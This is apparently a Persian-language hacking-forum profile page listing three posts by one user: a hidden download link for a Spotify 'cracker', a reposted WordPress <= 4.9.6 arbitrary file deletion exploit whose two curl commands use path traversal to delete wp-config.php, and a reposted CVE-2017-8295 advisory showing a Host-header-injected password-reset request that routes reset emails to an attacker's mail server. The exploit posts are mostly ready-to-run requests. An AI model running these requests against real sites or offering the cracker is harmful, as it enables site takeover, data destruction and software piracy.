رفتن به مطلب

behr0uz

اعضا
  • تعداد ارسال ها

    3
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

16 Good

3 دنبال کننده

درباره behr0uz

آخرین بازدید کنندگان نمایه

2,015 بازدید کننده نمایه
  1. behr0uz

    دانلود کرکر spotify

    لینک دانلود : [Hidden Content]
  2. behr0uz

    WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion

    # Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability # Date: 2018-06-27 # Exploit Author: VulnSpy # Vendor Homepage: [Hidden Content] # Software Link: [Hidden Content]/download # Version: <= 4.9.6 # Tested on: php7 mysql5 # CVE : Step 1: ``` curl -v '[Hidden Content]' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ``` Step 2: ``` curl -v '[Hidden Content]' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ``` REF: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit - [Hidden Content] WARNING: WordPress File Delete to Code Execution - [Hidden Content]
  3. behr0uz

    WordPress < 4.7.4 - Unauthorized Password Reset

    ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - [Hidden Content] - CVE-2017-8295 - Release date: 03.05.2017 - Revision 1.0 - Severity: Medium/High ============================================= Source: [Hidden Content] If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost): -----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------ Wordpress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. As a result, Wordpress will pass the following headers and email body to the /usr/bin/sendmail wrapper: ------[ resulting e-mail ]----- Subject: [CompanyX WP] Password Reset Return-Path: <wordpress@attackers-mxserver.com> From: WordPress <wordpress@attackers-mxserver.com> Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Someone requested that the password be reset for the following account: [Hidden Content] Username: admin If this was a mistake, just ignore this email and nothing will happen. To reset your password, visit the following address: <[Hidden Content]wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin> ------------------------------- As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set. The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of: #!/bin/bash cat > /tmp/outgoing-email
×
×
  • اضافه کردن...